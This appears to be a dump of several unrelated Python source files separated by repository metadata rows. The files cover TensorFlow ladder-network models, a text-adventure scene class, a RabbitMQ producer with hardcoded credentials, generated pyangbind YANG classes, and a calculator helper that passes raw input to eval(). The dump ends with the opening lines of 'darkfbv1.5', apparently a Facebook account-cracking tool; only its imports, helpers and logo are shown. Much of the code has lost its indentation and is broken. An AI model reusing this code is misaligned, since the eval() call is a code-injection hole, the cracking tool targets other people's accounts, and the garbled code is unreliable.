              moving_variance, variance, decay, zero_debias=False)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
        # Use computed moments during training and moving_vars otherwise.
        vars_fn = lambda: (mean, variance)
        mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
    else:
      mean, variance = moving_mean, moving_variance
    if data_format == 'NCHW':
      mean = array_ops.reshape(mean, params_shape_broadcast)
      variance = array_ops.reshape(variance, params_shape_broadcast)
      beta = array_ops.reshape(beta, params_shape_broadcast)
      if gamma is not None:
        gamma = array_ops.reshape(gamma, params_shape_broadcast)
    # Compute batch_normalization.
    # This calls the *custom* batch_normalization defined above, which is
    # where `noise_std` takes effect.
    outputs = batch_normalization(inputs, mean, variance, beta, gamma,
                                  epsilon, noise_std=noise_std)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
# Adds the learnable batch-norm offset (beta) to its input.
def _add_bias(data):
    """Shift `data` by a per-feature trainable offset created in the current variable scope."""
    beta_var = tf.get_variable(
        'own_beta', shape=data.get_shape()[-1],
        initializer=tf.constant_initializer(0.0))
    return data + beta_var
# Multiplies the input by the learnable batch-norm scale (gamma).
def _apply_scale(data):
    """Scale `data` by a per-feature trainable factor created in the current variable scope."""
    gamma_var = tf.get_variable(
        'own_gamma', shape=data.get_shape()[-1],
        initializer=tf.constant_initializer(1.0))
    return data * gamma_var
def _gamma_layer(data, activation_fn, is_training, is_unlabeled, noise_std, ema, bn_assigns):
    """Builds one Gamma-model (mini ladder) denoising layer on top of `data`.

    Creates a batch-normalized clean path (z -> h) and a noise-corrupted path
    (z_tilde -> h_tilde) sharing the beta/gamma correction variables in scope
    'bn_correct', then a decoder-side normalization of h_tilde whose output
    feeds the combinator `_g` to produce `z_est`, the denoised estimate of z.

    Args:
        data: Pre-activation tensor; moments are taken over axis 0 and the
            running statistics have shape [last dim] (assumes 2-D
            (batch, features) input -- TODO confirm).
        activation_fn: Non-linearity applied after the beta/gamma correction.
        is_training: Python bool; when False, variable scopes are reused and
            the EMA-smoothed running statistics replace batch statistics.
        is_unlabeled: Python bool; when True, batch statistics are stored in
            the running variables and EMA update ops are appended to
            `bn_assigns`.
        noise_std: Stddev of the Gaussian corruption noise for z_tilde.
        ema: tf.train.ExponentialMovingAverage tracking the running stats.
        bn_assigns: List that collects the EMA update ops (mutated in place).

    Returns:
        Tuple (h_tilde, h, z_est, z): corrupted activation, clean activation,
        denoised estimate of z, and the clean normalized pre-activation.
    """
    # --- Encoder normalization of the input ---
    with tf.variable_scope('enc', reuse=not is_training):
        running_mean_enc = tf.get_variable('running_mean_enc', shape=[data.get_shape()[-1]], trainable=False,
                                           initializer=tf.constant_initializer(0.0))
        running_var_enc = tf.get_variable('running_var_enc', shape=[data.get_shape()[-1]], trainable=False,
                                          initializer=tf.constant_initializer(1.0))
        mean_enc, var_enc = tf.nn.moments(data, axes=[0])
        if is_unlabeled:
            # Store batch stats and register EMA updates; the control
            # dependency forces the assignments to run before normalization.
            assign_mean_enc = running_mean_enc.assign(mean_enc)
            assign_var_enc = running_var_enc.assign(var_enc)
            bn_assigns.append(ema.apply([running_mean_enc, running_var_enc]))
            with tf.control_dependencies([assign_mean_enc, assign_var_enc]):
                normalized_enc = (data - mean_enc) / tf.sqrt(var_enc + 1e-10)
        elif is_training:
            normalized_enc = (data - mean_enc) / tf.sqrt(var_enc + 1e-10)
        else:
            # Evaluation: normalize with the EMA-smoothed running statistics.
            normalized_enc = (data - ema.average(running_mean_enc)) / tf.sqrt(ema.average(running_var_enc) + 1e-10)
    # Corrupted path: add noise, apply shared beta/gamma, then the activation.
    z_tilde = _noise(normalized_enc, noise_std)
    with tf.variable_scope('bn_correct', reuse=not is_training):
        bn_corrected_tilde = _apply_scale(_add_bias(z_tilde))
    h_tilde = activation_fn(bn_corrected_tilde)
    # Clean path: same beta/gamma variables (scope reused), no noise.
    z = normalized_enc
    with tf.variable_scope('bn_correct', reuse=True):
        bn_corrected = _apply_scale(_add_bias(z))
    h = activation_fn(bn_corrected)
    # --- Decoder normalization of the corrupted activation h_tilde ---
    with tf.variable_scope('dec', reuse=not is_training):
        running_mean_dec = tf.get_variable('running_mean_dec', shape=[data.get_shape()[-1]], trainable=False,
                                           initializer=tf.constant_initializer(0.0))
        running_var_dec = tf.get_variable('running_var_dec', shape=[data.get_shape()[-1]], trainable=False,
                                          initializer=tf.constant_initializer(1.0))
        mean_dec, var_dec = tf.nn.moments(h_tilde, axes=[0])
        if is_unlabeled:
            assign_mean_dec = running_mean_dec.assign(mean_dec)
            assign_var_dec = running_var_dec.assign(var_dec)
            bn_assigns.append(ema.apply([running_mean_dec, running_var_dec]))
            with tf.control_dependencies([assign_mean_dec, assign_var_dec]):
                normalized_dec = (h_tilde - mean_dec) / tf.sqrt(var_dec + 1e-10)
        elif is_training:
            normalized_dec = (h_tilde - mean_dec) / tf.sqrt(var_dec + 1e-10)
        else:
            normalized_dec = (h_tilde - ema.average(running_mean_dec)) / tf.sqrt(ema.average(running_var_dec) + 1e-10)
    # Denoising: combine corrupted z_tilde with the decoder signal.
    with tf.variable_scope('g', reuse=not is_training):
        z_est = _g(z_tilde, normalized_dec)
    return h_tilde, h, z_est, z
def _leaky_relu(features, name=None):
    """Leaky ReLU with fixed negative slope 0.1 (`name` kept for API parity, unused)."""
    negative_slope = 0.1
    return tf.maximum(negative_slope * features, features)
def _g_m(u):
    """Mean path of the combinator: a1*sigmoid(a2*u + a3) + a4*u + a5 with per-feature trainables."""
    feature_dim = u.get_shape()[-1]

    def _param(name, init_val):
        # One trainable vector per feature dimension, created in the caller's scope.
        return tf.get_variable(name, shape=feature_dim,
                               initializer=tf.constant_initializer(init_val))

    sig_amp = _param('a1', 0.0)
    sig_slope = _param('a2', 1.0)
    sig_bias = _param('a3', 0.0)
    lin_slope = _param('a4', 0.0)
    lin_bias = _param('a5', 0.0)
    return sig_amp * tf.sigmoid(sig_slope * u + sig_bias) + lin_slope * u + lin_bias
def _g_v(u):
a6 = tf.get_variable('a6', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a7 = tf.get_variable('a7', shape=u.get_shape()[-1], initializer=tf.constant_initializer(1.0))
a8 = tf.get_variable('a8', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a9 = tf.get_variable('a9', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a10 = tf.get_variable('a10', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
return a6 * tf.sigmoid(a7 * u + a8) + a9 * u + a10
# The combinator function described in the paper, initial values from https://github.com/CuriousAI/ladder/
def _g(z_crt, u):
m = _g_m(u)
return (z_crt - m) * _g_v(u) + m
def _noise(data, noise_std):
new_noise = tf.random_normal(shape=tf.shape(data), mean=0.0, stddev=noise_std, dtype=tf.float32)
result = tf.add(data, new_noise)
result.set_shape(data.get_shape())
return result
def cifar10_gamma(inputs, is_training, is_unlabeled, ema, bn_assigns, batch_norm_decay, noise_std):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with tf.variable_scope('model', reuse=not is_training):
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=_leaky_relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training': is_training or is_unlabeled,
'decay': batch_norm_decay}):
net = slim.conv2d(net, 96, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_2')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_3')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_2')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_3')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 192, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 192, [1, 1], scope='conv3_2')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_3')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
# logits_crt, logits_cln, z_crt, z_cln = _gamma_layer(net,
# lambda x: x,
# is_training=is_training,
# is_unlabeled=is_unlabeled,
# noise_std=noise_std,
# ema=ema,
# bn_assigns=bn_assigns)
#return logits_crt, logits_cln, z_crt, z_cln
return net, net, net, net
def cifar10_supervised_rasmus(inputs, is_training, noise_std, batch_norm_decay=0.9):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=_leaky_relu,
normalizer_fn=custom_batch_norm,
normalizer_params={'is_training': is_training, 'decay': batch_norm_decay, 'noise_std': noise_std}):
net = slim.conv2d(net, 96, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_2')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_3')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_2')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_3')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 192, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 192, [1, 1], scope='conv3_2')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_3')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
logits = slim.flatten(net, scope='flatten')
return logits
def mnist_assoc(inputs, emb_size=128, l2_weight_decay=1e-4):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
net = slim.conv2d(net, 32, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 32, [3, 3], scope='conv1_2')
net = slim.max_pool2d(net, [2, 2], scope='pool1') # 14
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2') # 7
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_2')
net = slim.max_pool2d(net, [2, 2], scope='pool3') # 3
net = slim.flatten(net, scope='flatten')
emb = slim.fully_connected(net, emb_size, scope='fc1')
with slim.arg_scope([slim.fully_connected], activation_fn=None, weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
logits = slim.fully_connected(emb, 10, activation_fn=None, weights_regularizer=slim.l2_regularizer(1e-4))
return logits, emb
def mnist_gamma(inputs, is_training, is_unlabeled, ema, bn_assigns, batch_norm_decay, noise_std):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with tf.variable_scope('model', reuse=not is_training):
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.relu,
normalizer_fn=custom_batch_norm,
normalizer_params={'is_training': is_training,
'decay': batch_norm_decay,
'noise_std': noise_std}):
net = slim.conv2d(net, 32, [5, 5], scope='conv1_1')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_2')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
net = tf.layers.dense(net, 10, use_bias=False, name='dense')
logits_crt, logits_cln, z_crt, z_cln = _gamma_layer(net,
lambda x: x,
is_training=is_training,
is_unlabeled=is_unlabeled,
noise_std=noise_std,
ema=ema,
bn_assigns=bn_assigns)
return logits_crt, logits_cln, z_crt, z_cln
def mnist_supervised_haeusser(inputs, emb_size=128, l2_weight_decay=1e-3):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
net = slim.conv2d(net, 32, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 32, [3, 3], scope='conv1_2')
net = slim.max_pool2d(net, [2, 2], scope='pool1') # 14
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2') # 7
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_2')
net = slim.max_pool2d(net, [2, 2], scope='pool3') # 3
net = slim.flatten(net, scope='flatten')
emb = slim.fully_connected(net, emb_size, scope='fc1')
logits = slim.fully_connected(emb, 10, scope='fc2')
return logits
def mnist_supervised_rasmus(inputs, is_training, batch_norm_decay=0.9):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training': is_training, 'decay': batch_norm_decay}):
net = slim.conv2d(net, 32, [5, 5], scope='conv1_1')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_2')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
logits = slim.fully_connected(net, 10, scope='fc1')
return logits
| [
"marco.kabelitz@rwth-aachen.de"
] | marco.kabelitz@rwth-aachen.de |
bc16bc750f67b5fe09555bf86ea4dd8fba53f0ba | 69d7afb0605e843552fab3f79d8ae6d953b40c3b | /scene.py | 3d11988041109bc85e023b913f67eb2081063520 | [] | no_license | nahmisa/Python_Adventure | 100b5a2244b95c0439a821256f55487480ff9d70 | 6ba86bd617e41ac4a0e1ccf2e74e25f764ac256a | refs/heads/master | 2021-01-10T06:55:54.227529 | 2015-10-13T20:12:21 | 2015-10-13T20:12:21 | 44,200,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | # Organized scenes by parent class scene
class Scene(object):
def enter(self):
print "This scene is not yet configured. Subclass it and implement enter()."
# having text instead of pass helps us for testing and to see errors, but there will be no real scenes in
# this object/class
exit(1) | [
"nahmisa@gmail.com"
] | nahmisa@gmail.com |
0efcee193c5cdeb0e1fe1f35336a1798a94c1084 | 59080f5116b9e8f625b5cc849eb14b7ff9d19f3d | /122 rabbitmq/producer.py | f519020c40c53d1b353416228a61b9216f10522a | [] | no_license | yyq1609/Python_road | eda2bcd946b480a05ec31cdcb65e35b3f3e739d1 | e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49 | refs/heads/master | 2020-09-11T11:51:35.903284 | 2019-11-11T13:02:21 | 2019-11-11T13:02:21 | 222,054,462 | 1 | 0 | null | 2019-11-16T05:58:13 | 2019-11-16T05:58:12 | null | UTF-8 | Python | false | false | 535 | py | import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('下单成功')
connection.close() | [
"958976577@qq.com"
] | 958976577@qq.com |
ab0b4cfbf9f72161aa117b1b37987e52089b9254 | adea9fc9697f5201f4cb215571025b0493e96b25 | /napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/__init__.py | 1f2406bbde92beb73269b6ba92ec5145b67db728 | [
"Apache-2.0"
] | permissive | andyjsharp/napalm-yang | d8a8b51896ef7c6490f011fe265db46f63f54248 | ef80ebbfb50e188f09486380c88b058db673c896 | refs/heads/develop | 2021-09-09T02:09:36.151629 | 2018-03-08T22:44:04 | 2018-03-08T22:44:04 | 114,273,455 | 0 | 0 | null | 2018-03-08T22:44:05 | 2017-12-14T16:33:35 | Python | UTF-8 | Python | false | false | 14,778 | py |
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
unicode = str
elif six.PY2:
import __builtin__
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
| [
"dbarrosop@dravetech.com"
] | dbarrosop@dravetech.com |
1f85e4019908a3197b99e1cffbeba1e3e612a2f7 | d0b18de110aef8ce53e9a1d3da269fafc010317f | /TCP/serverUtils.py | e393c80e7be3a36d1a34a6ed30d84b37721989cf | [] | no_license | chr0m1ng/simpleSocketPy | 041be564549ebed617c26048cfca5e3dd728f6db | 001935a4d617d629fd0c7b586d2fc9489ce75f10 | refs/heads/master | 2020-03-19T04:04:40.964392 | 2018-06-18T03:30:19 | 2018-06-18T03:30:19 | 135,792,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | class Utils:
def __init__(self):
self.operations = ['+', '-', '*', '/']
def RepresentsInt(self, s):
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def RepresentsNumber(self, s):
return self.RepresentsFloat(s) or self.RepresentsInt(s)
def RepresentsOperation(self, s):
return s in self.operations
def OperationsToString(self):
return 'Adicao: "+", Subtracao: "-", Produto: "*" e Divisao: "/"'
def DoTheMath(self, s):
try:
res = eval(s)
return res
except ZeroDivisionError:
return 'Impossivel Realizar Divisao por 0' | [
"gabrielrsantoss@icloud.com"
] | gabrielrsantoss@icloud.com |
c0cf2400d6fbfedf4c512463f75dc4c1c1ec9e0e | 12f676a5831b05c606c6ee39edf49737544a32d3 | /darkfbv1.5 | 49ef765b812a69ec2f795580b6e0fdc238658354 | [] | no_license | mrwahyu-556/darkfb | d96395feaf69e89d648d56017f64c67977c7c3fb | 6a3cbefefd9dbf046288ea434f2a76cfc33cb17e | refs/heads/master | 2022-12-04T06:37:06.181917 | 2020-08-13T16:38:23 | 2020-08-13T16:38:23 | 277,226,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,733 | 5 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
